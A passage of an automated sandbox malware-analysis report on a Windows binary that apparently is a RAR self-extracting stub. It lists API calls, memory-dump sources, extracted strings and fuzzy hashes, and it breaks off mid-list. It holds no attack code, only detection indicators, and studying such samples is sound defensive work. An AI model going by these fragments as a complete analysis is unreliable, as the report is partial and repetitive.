                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 2940173790-393685449
                          • Opcode ID: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                          • Instruction ID: 66aea74b7acc8adea111ea663495a18835cbd92b260f0c15e21987f345aac0f1
                          • Opcode Fuzzy Hash: 65edb01f61f21fff02eaccc9a46b43a233fa456fccf40e480b66f774ee54b1a7
                          • Instruction Fuzzy Hash: 1DE1C572908B828AF710AF35E8803AEB7A0FB45768F944135DA4C47B55EF38E489E710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AllocClearStringVariant
                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                          • API String ID: 1959693985-3505469590
                          • Opcode ID: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                          • Instruction ID: 5e0a86f247350d99af437a08f824f236cae64605fa6945793330c949055a0f59
                          • Opcode Fuzzy Hash: a8b35b7bcd37d82ee4aaa20c3b876beaab518b1de9e1ce59ea14af8b32f1fe8d
                          • Instruction Fuzzy Hash: 91713B36A14E15C5FB10DF29EC805AAB7B1FB89BA8B915136DE4E43B68CF38D548D310
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF716147371
                          • GetLastError.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF71614737F
                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF7161473A9
                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF7161473EF
                          • GetProcAddress.KERNEL32(?,?,00000000,00007FF7161474F3,?,?,?,00007FF71614525E,?,?,?,00007FF716145219), ref: 00007FF7161473FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                          • Instruction ID: ca20ffd78f3629f65c0e5b4b146132715e13200dccd14a13c2b16e128d9fed6c
                          • Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
                          • Instruction Fuzzy Hash: 4F318C21B1AE4281FE51FB16BC00676A2A4FF08BB0F994535DD1D4B394EF3CE0499720
                          APIs
                          • GetModuleHandleW.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF71614162B
                          • GetProcAddress.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF716141648
                          • GetProcAddress.KERNEL32(?,?,?,00007FF716141573,?,?,?,00007FF71614192A), ref: 00007FF716141664
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                          • API String ID: 667068680-1718035505
                          • Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                          • Instruction ID: 6a51f7e993836ff9b8ae7e0e4b55ae1997a9061d18e9c1520ba79df17c915e45
                          • Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
                          • Instruction Fuzzy Hash: 61112E30B19F4281FD946B04BD41276D2A16F097B5FC94435C81E47754FF7CE44CA620
                          APIs
                            • Part of subcall function 00007FF7161251A4: GetVersionExW.KERNEL32 ref: 00007FF7161251D5
                          • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612ED8C
                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612ED98
                          • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EDA8
                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EDB6
                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EDC4
                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF716115AB4), ref: 00007FF71612EE05
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Time$File$System$Local$SpecificVersion
                          • String ID:
                          • API String ID: 2092733347-0
                          • Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                          • Instruction ID: 09e97e6380c88d83ee8b33d0b5fd5582f1e33eaf522ae29b64084d297099a75e
                          • Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
                          • Instruction Fuzzy Hash: 9B517CB2B00A51CAFB04DF79E8411ADB7B1F748798BA0403ADE0D57B58DB38E559C710
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Time$File$System$Local$SpecificVersion
                          • String ID:
                          • API String ID: 2092733347-0
                          • Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                          • Instruction ID: bca81dbe2cfdf54ca925674f987554a847253ed4856afcc775357290b7e79822
                          • Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
                          • Instruction Fuzzy Hash: 0B313B66B10A51CDFB00DFB9E8811ADB771FF08758B94502AEE0E97A58EF38D499C710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID: .rar$exe$rar$sfx
                          • API String ID: 3668304517-630704357
                          • Opcode ID: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                          • Instruction ID: ff6f01f10b450d42f9925a68d9d4fb02f847463e8c1812e9d0270672cf5cf3f3
                          • Opcode Fuzzy Hash: 97aafd44a7caf21700e2098a6ceb5321661423453e734b1945fa1e7d2bcd8431
                          • Instruction Fuzzy Hash: 70A1B322A14E1680FB00AB25FC452BBA362BF45BB4FA44239DD1D076E9DF3CD559D360
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: abort$CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 2889003569-2084237596
                          • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                          • Instruction ID: f71f87793ef591d19aa58365d0be07849f965e62872575c2da1914316aea9058
                          • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                          • Instruction Fuzzy Hash: 2291C173A09B918AF710DB65E8802AEBBA0FB04798F504139EF4C17B59EF38D199D710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                          • Instruction ID: bd212283907c8c42f90d16ef81b30177072b11e31c7b588a668cc129f287eaad
                          • Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
                          • Instruction Fuzzy Hash: 5151D835A15A4286F714EF15FC44A3AB765FB44BA8F908030DE1E47B48EF78E849D750
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                          • API String ID: 2102711378-639343689
                          • Opcode ID: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                          • Instruction ID: a6996e78b1ac89a09925ac2b21fbcfbf10256b44e929042fd125ac13b82d67e3
                          • Opcode Fuzzy Hash: 87299e3d8371150436d20a5d335114172b85ee8c064b133af49689baa0f6dc88
                          • Instruction Fuzzy Hash: 5F51A1A2E18F5285FA00FB75FC411BBA361AF557B4FC00135DE1D57696DE2CA889D220
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: Window$Show$Rect
                          • String ID: RarHtmlClassName
                          • API String ID: 2396740005-1658105358
                          • Opcode ID: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                          • Instruction ID: 1ec83c400f75ec68b74d10c9221ff178d175c42f5235238e4fbf299225c7309b
                          • Opcode Fuzzy Hash: 95333b9ad2bfddc98b100d65ee3ae7a1141886215ecc40d0d40dcbf9cb340d19
                          • Instruction Fuzzy Hash: 3F518322608F8286FA24EB25F84437BE7A1FB857A0F804435DE4E47B55DF3CE4499710
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                          • String ID: sfxcmd$sfxpar
                          • API String ID: 3540648995-3493335439
                          • Opcode ID: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                          • Instruction ID: 045f7ab6739a3de5cb8c339719235e6f7fd970c8256b03c0465098cdafa3e3f5
                          • Opcode Fuzzy Hash: 48e58e823320ee2e30a8ba7f247afa82eb81b269a21fe23b9d6641b37ea74fe4
                          • Instruction Fuzzy Hash: 4C317072A14F1588FB00AB69F8841AEA371FB49BA8F940131DE5E177A9DF38D049D364
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID:
                          • String ID: RENAMEDLG$REPLACEFILEDLG
                          • API String ID: 0-56093855
                          • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                          • Instruction ID: 8507b42ed551188425dc43c23b82753dfe1b0d9d55f29e11fc758d80588f91bf
                          • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                          • Instruction Fuzzy Hash: DA211B26908F4784FA10EB19FC44176E7A4EB4ABB4F940036D98E47364DE3CE88CE364
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                          • Instruction ID: f55c5af282c14e16c31a7a8bdc507f89420a1d8d802e1d0bda345d92e6fb8641
                          • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                          • Instruction Fuzzy Hash: 33F03165A19E4281FE84AB15FC8027AE3B0AF887A4F851035DD4F47659DF3CD4889720
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true
                          • Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
